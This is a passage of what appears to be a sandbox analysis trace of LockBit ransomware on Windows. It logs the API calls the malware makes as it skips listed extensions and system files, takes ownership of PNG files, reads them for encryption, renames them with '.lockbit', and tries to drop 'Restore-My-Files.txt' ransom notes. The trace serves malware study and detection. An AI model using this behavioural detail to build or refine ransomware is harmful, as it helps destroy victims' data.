-1 [0081.244] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.244] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.244] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.244] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.244] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.244] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.244] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.244] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.244] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.244] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.244] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.244] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.244] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.244] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png.lockbit") returned 92 [0081.244] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.245] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.245] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.245] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.245] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.245] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.245] RtlFreeAnsiString (AnsiString="\\") [0081.245] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0081.245] malloc (_Size=0x200) returned 0x77d800 [0081.245] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.246] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.246] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.246] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.246] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.246] CloseHandle (hObject=0x3c4) returned 1 [0081.247] free (_Block=0x77d800) [0081.247] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.247] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.247] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.247] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4955) returned 1 [0081.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.247] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.248] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.248] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.248] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.265] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.265] malloc (_Size=0xce) returned 0x77d800 [0081.265] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xce, FileInformationClass=0xa) returned 0xc0000008 [0081.265] free (_Block=0x77d800) [0081.265] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 1 [0081.265] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt") returned 74 [0081.265] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.265] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fbb7319, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fbb7319, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0081.265] lstrcmpiW (lpString1=".", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0081.265] lstrcmpiW (lpString1="..", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0081.265] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0081.265] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.265] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.265] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.265] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.265] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.265] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.265] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.265] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.265] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.265] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.265] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.265] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.266] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.266] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.266] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.266] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.266] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.266] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.266] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.266] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.267] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.267] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.267] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.267] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.267] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.267] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.267] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.267] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.267] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.267] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0081.267] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0081.267] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0081.267] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0081.267] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0081.267] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0081.267] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0081.267] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\") returned="" [0081.267] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png") returned=".png" [0081.267] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.267] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.267] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.267] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.267] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.267] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.268] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.268] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.268] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.268] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.268] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.268] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.268] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.268] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.268] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png.lockbit") returned 98 [0081.268] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.269] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.269] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.269] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.269] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.270] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.270] RtlFreeAnsiString (AnsiString="\\") [0081.270] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0081.270] malloc (_Size=0x200) returned 0x77d800 [0081.270] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.270] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.270] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.270] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.270] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.271] CloseHandle (hObject=0x3c4) returned 1 [0081.271] free (_Block=0x77d800) [0081.271] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.271] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.271] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.271] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3081) returned 1 [0081.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.272] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.280] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.280] malloc (_Size=0xda) returned 0x77d800 [0081.280] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xda, FileInformationClass=0xa) returned 0xc0000008 [0081.281] free (_Block=0x77d800) [0081.281] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 1 [0081.281] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt") returned 74 [0081.281] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.281] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb6b05f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb6b05f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="title_stripe.png", cAlternateFileName="")) returned 1 [0081.281] lstrcmpiW (lpString1=".", lpString2="title_stripe.png") returned -1 [0081.281] lstrcmpiW (lpString1="..", lpString2="title_stripe.png") returned -1 [0081.281] PathFindExtensionW (pszPath="title_stripe.png") returned=".png" [0081.281] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.281] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.281] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.281] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.281] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.281] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.281] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.281] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.281] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.281] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.281] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.281] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.281] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.281] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.282] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.282] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.282] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.282] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.282] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.282] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.282] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.282] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.282] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.283] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.283] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.283] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.283] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.283] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.283] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="title_stripe.png") returned -1 [0081.283] lstrcmpiW (lpString1="ntldr", lpString2="title_stripe.png") returned -1 [0081.283] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="title_stripe.png") returned -1 [0081.283] lstrcmpiW (lpString1="bootsect.bak", lpString2="title_stripe.png") returned -1 [0081.283] lstrcmpiW (lpString1="autorun.inf", lpString2="title_stripe.png") returned -1 [0081.283] lstrcmpiW (lpString1="thumbs.db", lpString2="title_stripe.png") returned -1 [0081.283] lstrcmpiW (lpString1="iconcache.db", lpString2="title_stripe.png") returned -1 [0081.283] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\") returned="" [0081.283] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png") returned=".png" [0081.283] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.283] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.283] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.283] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.283] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.283] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.283] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.283] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.283] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.283] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.284] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.284] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.284] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.284] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.284] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.284] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.284] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.284] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.284] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.284] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.284] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.284] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.284] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.284] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.284] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.284] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.284] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.284] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.284] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png.lockbit") returned 78 [0081.284] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\title_stripe.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.285] GetProcAddress (hModule=0x77c40000, 